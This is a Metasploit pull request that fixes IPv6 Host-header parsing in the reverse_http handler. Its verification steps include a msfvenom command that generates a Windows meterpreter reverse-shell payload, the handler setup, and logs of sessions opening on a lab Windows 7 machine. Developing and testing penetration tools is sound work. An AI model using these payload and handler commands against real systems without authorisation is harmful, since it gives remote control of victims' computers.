### PR TITLE
Fix parse IPv6 address in reverse_http

### DIFF
--- a/lib/msf/core/handler/reverse_http.rb
+++ b/lib/msf/core/handler/reverse_http.rb
@@ -6,6 +6,7 @@ require 'rex/post/meterpreter'
 require 'rex/socket/x509_certificate'
 require 'msf/core/payload/windows/verify_ssl'
 require 'rex/user_agent'
+require 'uri'
 
 module Msf
 module Handler
@@ -118,9 +119,9 @@ module ReverseHttp
 
     # Extract whatever the client sent us in the Host header
     if req && req.headers && req.headers['Host']
-        callback_host, callback_port = req.headers['Host'].split(":")
-        callback_port = callback_port.to_i
-        callback_port ||= (ssl? ? 443 : 80)
+      cburi = URI("#{scheme}://#{req.headers['Host']}")
+      callback_host = cburi.host
+      callback_port = cburi.port
     end
 
     # Override the host and port as appropriate


### PR DESCRIPTION
This PR fixes an error that meterpreter session does not establish when setting IPv6 address in LHOST of reverse_http.

## Verification
- [x] `msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_http LHOST=<ipv6 address> LPORT=<lport> -f psh-cmd > payload.bat`
- [x] Start `msfconsole`
- [x] `use exploit/multi/handler`
- [x] `set PAYLOAD windows/meterpreter/reverse_http`
- [x] `set LHOST <ipv6 address>`
- [x] `set LPORT <lport>`
- [x] (`set ReverseListenerBindAddress <ipv6 address%scope id>`) --- if LHOST is link local
- [x] `set ExitOnSession false`
- [x] `run -j`
- [x] execute payload
- [x] **Verify** that the output does not contain any error messages


### Before fix

~~~
root@host64msf:~# dpkg -l | grep metasploit
ii  metasploit-framework                       5.0.25+20190526102506~1rapid7-1              amd64        The full stack of metasploit-framework
~~~

~~~
msf5 > version
Framework: 5.0.25-dev-
Console  : 5.0.25-dev-

msf5 > use multi/handler
msf5 exploit(multi/handler) > set PAYLOAD windows/meterpreter/reverse_http
PAYLOAD => windows/meterpreter/reverse_http
msf5 exploit(multi/handler) > set LHOST fe80::a00:27ff:fef2:e1b0
LHOST => fe80::a00:27ff:fef2:e1b0
msf5 exploit(multi/handler) > set ReverseListenerBindAddress fe80::a00:27ff:fef2:e1b0%eth1
ReverseListenerBindAddress => fe80::a00:27ff:fef2:e1b0%eth1
msf5 exploit(multi/handler) > set LPORT 8080
LPORT => 8080
msf5 exploit(multi/handler) > set ExitOnSession false
ExitOnSession => false
msf5 exploit(multi/handler) > run -j
[*] Exploit running as background job 0.
[*] Exploit completed, but no session was created.

msf5 exploit(multi/handler) > 
[*] Started HTTP reverse handler on http://[fe80::a00:27ff:fef2:e1b0%eth1]:8080
msf5 exploit(multi/handler) > 
 
 ::
 ::
 (execute payload)
 ::

[-] http://[fe80::a00:27ff:fef2:e1b0%eth1]:8080 handling request from fe80::d45b:27a1:9b93:480%eth1; (UUID: mzm9frxj) Exception handling request: bad URI(is not URI?): http://[fe80:8080/Cq6fKkmIs7QwVzFWbLukRAxpDbdBIcOwf1yFofG6K6XQlGiuTq6XS6thezl6JomFTiKeBXXretnku/
~~~

### After fix


~~~
 ::
 ::
 (execute payload)
 ::
[*] http://[fe80::a00:27ff:fef2:e1b0%eth1]:8080 handling request from fe80::d45b:27a1:9b93:480%eth1; (UUID: wwpuwthm) Staging x86 payload (180825 bytes) ...
[*] Meterpreter session 1 opened (fe80::a00:27ff:fef2:e1b0%eth1:8080 -> fe80::d45b:27a1:9b93:480%eth1:49159) at 2019-05-28 10:28:32 +0900

msf5 exploit(multi/handler) > sessions -i 1
[*] Starting interaction with 1...

meterpreter > sysinfo
Computer        : WIN7-001
OS              : Windows 7 (Build 7601, Service Pack 1).
Architecture    : x86
System Language : ja_JP
Domain          : LOCALDOMAIN
Logged On Users : 3
Meterpreter     : x86/windows
meterpreter > 

~~~

PAYLOAD=windows/meterpreter/reverse_http, LPORT=80:
~~~
 ::
 ::
 (execute payload)
 ::
[*] http://[fe80::a00:27ff:fef2:e1b0%eth1]:80 handling request from fe80::d45b:27a1:9b93:480%eth1; (UUID: sxbx1dtl) Staging x86 payload (180825 bytes) ...
[*] Meterpreter session 2 opened (fe80::a00:27ff:fef2:e1b0%eth1:80 -> fe80::d45b:27a1:9b93:480%eth1:49164) at 2019-05-28 10:34:12 +0900
 ::
~~~

PAYLOAD=windows/meterpreter/reverse_http**s**, LPORT=8443:
~~~
 ::
 ::
 (execute payload)
 ::
[*] https://[fe80::a00:27ff:fef2:e1b0%eth1]:8443 handling request from fe80::d45b:27a1:9b93:480%eth1; (UUID: jqqxx1ys) Staging x86 payload (180825 bytes) ...
[*] Meterpreter session 3 opened (fe80::a00:27ff:fef2:e1b0%eth1:8443 -> fe80::d45b:27a1:9b93:480%eth1:49168) at 2019-05-28 10:35:45 +0900
 ::
~~~

PAYLOAD=windows/meterpreter/reverse_http**s**, LPORT=443:
~~~
 ::
 ::
 (execute payload)
 ::
[*] https://[fe80::a00:27ff:fef2:e1b0%eth1]:443 handling request from fe80::d45b:27a1:9b93:480%eth1; (UUID: e4mnnw6f) Staging x86 payload (180825 bytes) ...
[*] Meterpreter session 4 opened (fe80::a00:27ff:fef2:e1b0%eth1:443 -> fe80::d45b:27a1:9b93:480%eth1:49172) at 2019-05-28 10:37:06 +0900
 ::
~~~
